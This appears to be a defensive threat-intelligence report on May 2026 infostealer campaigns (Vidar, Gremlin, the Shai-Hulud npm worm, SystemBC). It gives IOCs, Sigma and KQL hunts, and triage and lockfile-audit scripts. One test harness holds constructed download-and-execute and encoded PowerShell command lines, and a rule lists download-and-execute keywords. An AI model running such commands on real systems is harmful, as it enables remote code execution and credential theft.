The AlienVault OTX pulses from May 19, 2026 reveal a coordinated surge in infostealer activity targeting enterprise credentials and cryptocurrency assets. The intelligence highlights the evolution of established families such as Vidar (rewritten in Go for evasion) and Gremlin Stealer (using advanced resource obfuscation), and the emergence of supply-chain attacks via the Shai-Hulud worm in the npm ecosystem. Additionally, threat actor UAT-8616 and The Gentlemen RaaS operation are actively exploiting edge infrastructure (Cisco SD-WAN, Fortinet) to gain initial access for webshell deployment and credential theft. SOC teams are advised to hunt immediately for the Go-based binaries and suspicious npm activity described below.
Threat Summary
This intelligence snapshot paints a picture of a highly adaptive credential theft landscape. Threat actors are diversifying their delivery methods—moving from traditional phishing to supply-chain compromises (Shai-Hulud via npm) and infrastructure exploitation (Cisco/Fortinet vulnerabilities).
- Campaign Objectives: Primary objectives include harvesting browser credentials, crypto-wallets, and session tokens. Secondary objectives include deploying cryptocurrency miners (XMRig) and establishing persistence via webshells and backdoors (SystemBC).
- Attack Chain: Actors gain initial access via malicious npm packages or by exploiting CVE-2026-20128 (Cisco SD-WAN) / CVE-2024-55591 (Fortinet). Upon access, they deploy droppers that utilize commercial packing or Go-compiled binaries to evade detection. C2 communications are obfuscated using legitimate services like Telegram and Steam profiles (Vidar) or commercial virtual machine-based obfuscation (Gremlin).
Threat Actor / Malware Profile
Vidar v1.5 (Go)
- Family: Infostealer (Arkei descendant)
- Distribution: Malicious payloads, likely delivered via SEO poisoning or bundling.
- Behavior: Snatches browser data, Steam sessions, and 2FA codes.
- C2: Uses "dead-drop" URLs hosted on Telegram and Steam profile pages to receive tasking.
- Evasion: Heavily obfuscated binary built with Go 1.25.4, featuring a 12-category sandbox scoring system that terminates execution when analysis is suspected.
Gremlin Stealer
- Family: Infostealer
- Distribution: Phishing campaigns.
- Behavior: Siphons payment card details and browser data.
- Evasion: Employs instruction virtualization via a commercial packing utility; transforms code into custom bytecode executed by a private VM. Hides payloads in embedded resource files.
Shai-Hulud (NPM Worm)
- Family: Worm / Infostealer
- Distribution: Supply-chain attack via malicious npm packages (chalk-tempalte, axios-util, etc.).
- Behavior: Acts as a worm to spread further and harvests credentials and cryptocurrency.
The Gentlemen (RaaS)
- Actor: The Gentlemen
- Malware: SystemBC (Proxy)
- Distribution: Exploits Fortinet (CVE-2024-55591) and Cisco (CVE-2025-32433) edge appliances via NTLM relay.
- Behavior: Recently suffered a backend leak ("Rocket"), exposing credentials. Uses SystemBC to tunnel traffic and maintain access.
IOC Analysis
The provided indicators span multiple infrastructure types used for C2, payload delivery, and initial access:
- File Hashes (SHA256/MD5): High-fidelity indicators for the Vidar, Gremlin, and SystemBC payloads. Push them to the EDR as custom block indicators (hash-based execution blocks) and hunt historically as well, since a block rule only stops future launches.
- Network Infrastructure (IPv4/URL): Specific IPs (e.g., 149.154.167.99, 194.87.92.109) and hostnames (lhr.lifedomains) serve as C2 nodes. Some of the addresses sit inside shared-provider ranges (149.154.167.99 is in Telegram's 149.154.160.0/20 allocation, 142.250.151.94 in Google's 142.250.0.0/15), which is exactly where the dead-drop profiles live alongside legitimate traffic, so a bare IP block will break those services. Block only with context: the initiating process is not a known client of the service, the TLS SNI does not name the expected service, or the User-Agent is not a browser or messenger.
- CVEs: CVE-2026-20128 (Cisco SD-WAN), CVE-2026-20133 and CVE-2024-55591 (Fortinet) define the initial-access surface. Prioritise these in vulnerability scanning of edge devices.
Operational teams should ingest these IOCs into SIEM correlation engines and firewall blocklists immediately.
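The context-aware handling described above, as an added example rather than tooling from the OTX pulses or Security Arsenal: the five C2 addresses come from this page, while the shared-provider ranges, the expected-client table, the `ServerName` (SNI) field and the Sysmon-style events are assumptions and constructed records for illustration. Dedicated attacker addresses are blocked outright; addresses inside Telegram's or Google's ranges are only alerted on when the process or SNI context is wrong.

```python
"""Context-aware triage of C2 hits whose IPs sit inside shared-provider ranges.

Added example for this write-up; it is not tooling from the OTX pulses or
Security Arsenal. The events below are constructed Sysmon-style
network-connection records, and the process/SNI allowlists are assumptions
made for illustration, not vendor-published data.
"""
import ipaddress

# The five C2 addresses named on this page.
C2_IPS = {"149.154.167.99", "135.181.237.59", "142.250.151.94",
          "194.87.92.109", "80.200.28.28"}

# Shared-provider ranges where a bare IP block would also hit legitimate traffic.
# 149.154.160.0/20 is allocated to Telegram and 142.250.0.0/15 to Google.
SHARED_RANGES = {
    "telegram": ipaddress.ip_network("149.154.160.0/20"),
    "google": ipaddress.ip_network("142.250.0.0/15"),
}

# Assumption: which clients are expected to talk to each service, either as a
# native client (Telegram Desktop speaks MTProto to bare IPs, so no SNI) or as a
# browser whose TLS SNI names the service.
EXPECTED_CLIENTS = {
    "telegram": {"processes": {"telegram.exe"},
                 "sni": (".telegram.org",)},
    "google": {"processes": {"chrome.exe", "msedge.exe", "firefox.exe"},
               "sni": (".google.com", ".googleapis.com", ".gstatic.com")},
}


def shared_owner(ip):
    """Name of the shared provider owning ip, or None for dedicated infrastructure."""
    addr = ipaddress.ip_address(ip)
    for owner, net in SHARED_RANGES.items():
        if addr in net:
            return owner
    return None


def classify(event):
    """Return 'ignore', 'block' or 'alert' for one connection event."""
    ip = event["DestinationIp"]
    if ip not in C2_IPS:
        return "ignore"
    owner = shared_owner(ip)
    if owner is None:
        return "block"              # dedicated attacker infrastructure: block outright
    expected = EXPECTED_CLIENTS[owner]
    process = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    sni = event.get("ServerName", "").lower()   # assumption: present only if the sensor logs SNI
    if process in expected["processes"] or (sni and sni.endswith(expected["sni"])):
        return "ignore"             # a known client reaching its own service
    return "alert"                  # shared-provider IP, but the context is wrong


EVENTS = [  # constructed records, not real telemetry
    {"id": 1, "Image": r"C:\Users\dev\AppData\Roaming\Telegram Desktop\Telegram.exe",
     "DestinationIp": "149.154.167.99", "ServerName": ""},
    {"id": 2, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "149.154.167.99", "ServerName": "web.telegram.org"},
    {"id": 3, "Image": r"C:\Users\dev\AppData\Local\Temp\updater.exe",
     "DestinationIp": "149.154.167.99", "ServerName": ""},
    {"id": 4, "Image": r"C:\Users\dev\Downloads\setup.exe",
     "DestinationIp": "194.87.92.109", "ServerName": ""},
    {"id": 5, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "142.250.151.94", "ServerName": "www.google.com"},
    {"id": 6, "Image": r"C:\Users\dev\Downloads\setup.exe",
     "DestinationIp": "142.250.151.94", "ServerName": ""},
    {"id": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "8.8.8.8", "ServerName": ""},
]


def triage(events):
    """Map each event id to its verdict."""
    return {e["id"]: classify(e) for e in events}


if __name__ == "__main__":
    for event_id, verdict in triage(EVENTS).items():
        print(event_id, verdict)
```

Events 1, 2 and 5 are the expected clients and are ignored; 3 and 6 are unknown binaries from user-writable paths reaching the same shared addresses and are alerted; 4 hits a dedicated address and is blocked. Sysmon does not record SNI, so in practice the `ServerName` check comes from a proxy or NDR feed joined on the flow.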
Detection Engineering
```yaml
title: Potential Vidar Stealer v1.5 Go Binary Activity
id: 7d1c2e3f-4a5b-6789-0123-456789abcdef
status: experimental
description: |
  Detects outbound connections to the C2 and dead-drop addresses associated with the Vidar v1.5
  campaign. Two of the addresses sit in shared-provider ranges (149.154.167.99 is in Telegram's
  149.154.160.0/20, 142.250.151.94 in Google's 142.250.0.0/15), so known clients of those services
  are filtered out and the remaining hits are triaged on the initiating process rather than blocked
  blindly. Exact IP matches are used; a substring match on an IPv4 string adds nothing but risk.
references:
  - https://otx.alienvault.com/pulse/6649a953e38d6a7393b50169
author: Security Arsenal
date: 2026/05/19
tags:
  - attack.command_and_control
  - attack.credential_access
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    DestinationIp:
      - '149.154.167.99'
      - '135.181.237.59'
      - '142.250.151.94'
      - '194.87.92.109'
  filter_known_clients:
    Image|endswith:
      - '\Telegram.exe'
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  condition: selection and not filter_known_clients
falsepositives:
  - Other legitimate clients of Telegram or Google infrastructure (verify process path and signature before escalating).
level: high
```
```yaml
title: Suspicious NPM Child Process Execution (Shai-Hulud Activity)
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
status: experimental
description: |
  Detects PowerShell, cmd.exe or wscript.exe spawned by node.exe with download-and-execute or
  clipboard strings on the command line, as expected from malicious install scripts such as those
  shipped by the Shai-Hulud packages (chalk-tempalte, @deadcode09284814/axios-util). npm itself runs
  under node.exe and launches lifecycle scripts through cmd.exe, so node.exe is the parent to key on
  (npm.cmd is a batch wrapper and never appears as a process image). Encoded commands
  (-EncodedCommand) are not covered by these strings; pair with a generic encoded-PowerShell rule.
references:
  - https://otx.alienvault.com/pulse/664c928c8c44b94040b2953b
author: Security Arsenal
date: 2026/05/19
tags:
  - attack.execution
  - attack.initial_access
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\node.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
    CommandLine|contains:
      - 'Invoke-Expression'
      - 'IEX'
      - 'DownloadString'
      - 'DownloadFile'
      - 'FromBase64String'
      - 'clipboard'
  condition: all of selection_*
falsepositives:
  - Legitimate build scripts running post-install tasks (node-gyp, native module builds); baseline per repository.
level: medium
```
```yaml
title: Potential SystemBC Proxy Activity (The Gentlemen Campaign)
id: f1e2d3c4-5678-90ab-cdef-abcdef123456
status: experimental
description: |
  Detects SystemBC proxy binaries by file name or by PE version metadata. SystemBC samples are rarely
  dropped under their own name, so either indicator alone is enough to fire (requiring both, as an AND,
  would almost never match). Treat hits as a low-volume hunting lead alongside the hash hunt below.
references:
  - https://otx.alienvault.com/pulse/664a2de5f6c268463b065c03
author: Security Arsenal
date: 2026/05/19
tags:
  - attack.command_and_control
  - attack.defense_evasion
logsource:
  category: process_creation
  product: windows
detection:
  selection_name:
    Image|endswith: '\systembc.exe'
  selection_metadata:
    - Company|contains: 'SystemBC'
    - Product|contains: 'SystemBC'
    - OriginalFileName|contains: 'SystemBC'
  condition: 1 of selection_*
falsepositives:
  - Unknown (rare in legitimate environments).
level: high
```
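Sigma's matching semantics are the part that decides whether the npm rule above fires: values in a list are OR'd, fields inside one selection are AND'd, and `all of selection_*` requires every selection. The following is an added example (not one of the page's rules and not Security Arsenal tooling) that implements only that subset and runs the rule's selections over constructed Sysmon event 1 style records, including an encoded-command variant the rule misses. Paths, command lines and the example.invalid URL are made up.

```python
"""Run the Shai-Hulud process-creation rule's logic over constructed events.

Added example, not one of the page's Sigma rules or Security Arsenal tooling.
Implements just enough of Sigma: 'field|endswith' and 'field|contains'
modifiers, list values OR'd, fields in one selection AND'd, and the
'all of selection_*' condition, all case-insensitive as in Sigma.
"""
import base64

RULE_SELECTIONS = {
    "selection_parent": {
        "ParentImage|endswith": ["\\node.exe"],
    },
    "selection_child": {
        "Image|endswith": ["\\powershell.exe", "\\cmd.exe", "\\wscript.exe"],
        "CommandLine|contains": ["Invoke-Expression", "DownloadString", "clipboard"],
    },
}


def field_matches(event, key, values):
    """One 'Field|modifier: [values]' line: any listed value matching is enough."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    wanted = [str(v).lower() for v in values]
    if modifier == "endswith":
        return any(actual.endswith(v) for v in wanted)
    if modifier == "contains":
        return any(v in actual for v in wanted)
    if modifier == "":
        return actual in wanted          # plain equality
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    """Fields within one selection map are AND'd."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def rule_matches(event):
    """condition: all of selection_*"""
    return all(selection_matches(event, sel) for sel in RULE_SELECTIONS.values())


def hits(events):
    """Ids of the events the rule fires on, in input order."""
    return [e["id"] for e in events if rule_matches(e)]


NODE = r"C:\Program Files\nodejs\node.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# PowerShell -EncodedCommand takes base64 of UTF-16LE; built here so the sample is real.
ENCODED = base64.b64encode("IEX (Get-Clipboard)".encode("utf-16le")).decode()

EVENTS = [  # constructed records, not real telemetry
    {"id": "legit-build", "ParentImage": NODE,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe /d /s /c "node-gyp rebuild"'},
    {"id": "malicious-downloadstring", "ParentImage": NODE, "Image": PWSH,
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s.ps1')\""},
    {"id": "malicious-clipboard", "ParentImage": NODE, "Image": PWSH,
     "CommandLine": 'powershell -w hidden -c "IEX (Get-Clipboard)"'},
    {"id": "malicious-encoded", "ParentImage": NODE, "Image": PWSH,
     "CommandLine": f"powershell -nop -w hidden -EncodedCommand {ENCODED}"},
    {"id": "not-node-parent", "ParentImage": r"C:\Windows\explorer.exe", "Image": PWSH,
     "CommandLine": "powershell -c Invoke-Expression (Get-Content .\\build.ps1)"},
]

if __name__ == "__main__":
    print("fires on:", hits(EVENTS))
```

The legitimate node-gyp build has the right lineage but none of the strings, so it stays quiet; the two plain-text payloads fire; the encoded one carries the same `IEX (Get-Clipboard)` but no matching substring, which is why the rule needs a companion rule on `-EncodedCommand` / `-enc` with base64 decoding in the triage step.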
```kql
// Hunt for Vidar, Gremlin and SystemBC payloads by hash, covering both process launches and file writes
union DeviceProcessEvents, DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in (
    "2995ffb73342453b258926ec865c724e3567eee1bb8eb35d61796ee0c4f25105",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5",
    "2172dae9a5a695e00e0e4609e7db0207d8566d225f7e815fada246ae995c0f9b",
    "281b970f281dbea3c0e8cfc68b2e9939b253e5d3de52265b454d8f0f578768a2",
    "691896c7be87f47f3e9ae914d76caaf026aaad0a1034e9f396c2354245215dc3",
    "971198ff86aeb42739ba9381923d0bc6f847a91553ec57ea6bae5becf80f8759",
    "9aab30a3190301016c79f8a7f8edf45ec088ceecad39926cfcf3418145f3d614",
    "9fda1ddb1acf8dd3685ec31b0b07110855832e3bed28a0f3b81c57fe7fe3ac20",
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2"
)
| project Timestamp, DeviceName, ActionType, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName, AccountName
| order by Timestamp desc
```

Advanced Hunting runs one query per request, so the network hunt is a separate query rather than a `;`-separated second statement:

```kql
// Hunt for network connections to the C2 addresses (Vidar/Gremlin/Shai-Hulud)
// 149.154.167.99 (Telegram range) and 142.250.151.94 (Google range) will also show legitimate clients:
// triage on the initiating process before adding either to a blocklist.
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteIP in ("149.154.167.99", "135.181.237.59", "142.250.151.94", "194.87.92.109", "80.200.28.28")
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, InitiatingProcessSHA256
| order by Timestamp desc
```
```powershell
# IOC Hunt for Vidar, Gremlin, and The Gentlemen Campaigns
# Run from an elevated session; Get-NetTCPConnection needs Windows 8 / Server 2012 or later.
# Check for presence of malicious file hashes on disk
$MaliciousHashes = @(
    "2995ffb73342453b258926ec865c724e3567eee1bb8eb35d61796ee0c4f25105",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5",
    "2172dae9a5a695e00e0e4609e7db0207d8566d225f7e815fada246ae995c0f9b",
    "281b970f281dbea3c0e8cfc68b2e9939b253e5d3de52265b454d8f0f578768a2",
    "691896c7be87f47f3e9ae914d76caaf026aaad0a1034e9f396c2354245215dc3",
    "971198ff86aeb42739ba9381923d0bc6f847a91553ec57ea6bae5becf80f8759",
    "9aab30a3190301016c79f8a7f8edf45ec088ceecad39926cfcf3418145f3d614",
    "9fda1ddb1acf8dd3685ec31b0b07110855832e3bed28a0f3b81c57fe7fe3ac20",
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2"
)

Write-Host "Scanning for malicious files (Vidar/Gremlin/SystemBC)..." -ForegroundColor Yellow
# Search the drop locations stealers favour. -File skips directories, -Force includes hidden items.
# The extension filter keeps the scan fast but misses renamed payloads; widen it if EDR telemetry shows others.
$Paths = @("$env:USERPROFILE\Downloads", "$env:USERPROFILE\AppData\Local\Temp", "$env:APPDATA", "C:\ProgramData")
foreach ($Path in $Paths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue | Where-Object {
            $_.Length -gt 0 -and $_.Extension -in ('.exe', '.dll', '.bin')
        } | ForEach-Object {
            try {
                $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                # -contains compares case-insensitively, so the upper-case hex from Get-FileHash matches the list
                if ($MaliciousHashes -contains $Hash) {
                    Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
                }
            } catch {
                # Locked or inaccessible file; skip it
            }
        }
    }
}

# Check active network connections against the C2 addresses from the pulses (Vidar/Gremlin/Shai-Hulud).
# 149.154.167.99 (Telegram range) and 142.250.151.94 (Google range) need the owning process verified before acting.
$MaliciousIPs = @("149.154.167.99", "135.181.237.59", "142.250.151.94", "194.87.92.109", "80.200.28.28")
Write-Host "Checking active network connections for C2 addresses..." -ForegroundColor Yellow
Get-NetTCPConnection -ErrorAction SilentlyContinue | Where-Object {
    $MaliciousIPs -contains $_.RemoteAddress
} | ForEach-Object {
    $Process = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    if ($Process) {
        Write-Host "[!] SUSPICIOUS CONNECTION: RemoteIP $($_.RemoteAddress):$($_.RemotePort) State $($_.State) PID $($_.OwningProcess) Process $($Process.ProcessName) Path $($Process.Path)" -ForegroundColor Red
    }
}
```
# Response Priorities
* **Immediate:** Block the identified C2 IPs and domains at the perimeter, applying process and SNI context for the addresses that sit in Telegram's and Google's ranges rather than blocking them outright. Push the payload hashes to the EDR as block indicators and run the hash hunt above. Deny `chalk-tempalte` and `@deadcode09284814/axios-util` in the internal npm registry proxy and in CI, and add `--ignore-scripts` to CI installs while the exposure is assessed.
* **24h:** Identify the developers and build agents that installed the malicious npm packages (lockfile history, registry proxy logs) and treat everything reachable from those machines as exposed: rotate npm publish tokens, CI secrets, cloud keys and SSH keys, and revoke active browser sessions. Force password resets and token rotation for any credentials suspected of being stolen by Vidar or Gremlin, and re-enrol 2FA for accounts whose codes Vidar could have captured.
* **1 Week:** Confirm every Cisco Catalyst SD-WAN and Fortinet edge appliance is patched for CVE-2026-20128 and CVE-2024-55591, starting now; any appliance still unpatched at the end of the week must have its management interfaces removed from the internet. Review authentication logs for NTLM relay activity associated with "The Gentlemen" indicators and for SystemBC proxy beacons.
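For the npm side of the response (the Shai-Hulud packages listed in the profile above and the registry-deny step in the priorities), the following is an added example, not Security Arsenal tooling and not a reproduction of the worm: it audits a `package-lock.json` for the two package names on this page, for any dependency that npm recorded as carrying an install-time script (`hasInstallScript`, present in lockfileVersion 2 and 3), and for tarballs resolved from somewhere other than the public registry. The lockfile embedded below is constructed, with made-up versions and URLs; the trusted-host set is an assumption you would extend with your internal proxy.

```python
"""Audit an npm package-lock.json for the Shai-Hulud package names on this page,
for dependencies that run install-time scripts, and for tarballs resolved
outside the public registry.

Added example; not Security Arsenal tooling and not a reproduction of the worm.
The lockfile below is constructed (lockfileVersion 3 layout) with made-up
versions and URLs; only the two package names come from the page.
"""
import json
import sys
from urllib.parse import urlparse

# Package names from the page.
BLOCKED_PACKAGES = {"chalk-tempalte", "@deadcode09284814/axios-util"}
# Assumption: add your internal registry proxy here.
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}

# Constructed lockfile, trimmed to the fields the audit needs.
SAMPLE_LOCKFILE = json.loads("""
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app",
         "dependencies": {"chalk": "^5.3.0", "chalk-tempalte": "1.0.3", "esbuild": "^0.21.0"}},
    "node_modules/chalk": {
      "version": "5.3.0",
      "resolved": "https://registry.npmjs.org/chalk/-/chalk-5.3.0.tgz"},
    "node_modules/chalk-tempalte": {
      "version": "1.0.3",
      "resolved": "https://registry.npmjs.org/chalk-tempalte/-/chalk-tempalte-1.0.3.tgz",
      "hasInstallScript": true},
    "node_modules/chalk-tempalte/node_modules/@deadcode09284814/axios-util": {
      "version": "0.1.2",
      "resolved": "https://mirror.example.invalid/axios-util-0.1.2.tgz"},
    "node_modules/esbuild": {
      "version": "0.21.0",
      "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.21.0.tgz",
      "hasInstallScript": true}
  }
}
""")


def package_name(path):
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (nested installs keep the last segment)."""
    return path.rsplit("node_modules/", 1)[-1]


def audit(lockfile):
    """Return sorted package names per finding category for a v2/v3 lockfile."""
    findings = {"blocked": [], "install_scripts": [], "off_registry": []}
    for path, entry in lockfile.get("packages", {}).items():
        if path == "":
            continue  # the root project itself
        name = package_name(path)
        if name in BLOCKED_PACKAGES:
            findings["blocked"].append(name)
        if entry.get("hasInstallScript"):
            findings["install_scripts"].append(name)
        host = urlparse(entry.get("resolved", "")).hostname
        if host and host not in TRUSTED_REGISTRY_HOSTS:
            findings["off_registry"].append(name)
    return {k: sorted(v) for k, v in findings.items()}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            lock = json.load(fh)
    else:
        lock = SAMPLE_LOCKFILE
    for category, names in audit(lock).items():
        print(f"{category}: {', '.join(names) or '-'}")
```

Run it as `python audit_lock.py package-lock.json` across repositories and build agents; an `install_scripts` hit is not proof of compromise (esbuild legitimately uses one), but every name in that list is a package whose code already ran with the developer's privileges and should be checked against `npm view <name> --json` and the registry proxy's download log. lockfileVersion 1 files use a `dependencies` tree and carry no `hasInstallScript` flag, so regenerate them with npm 7+ before auditing.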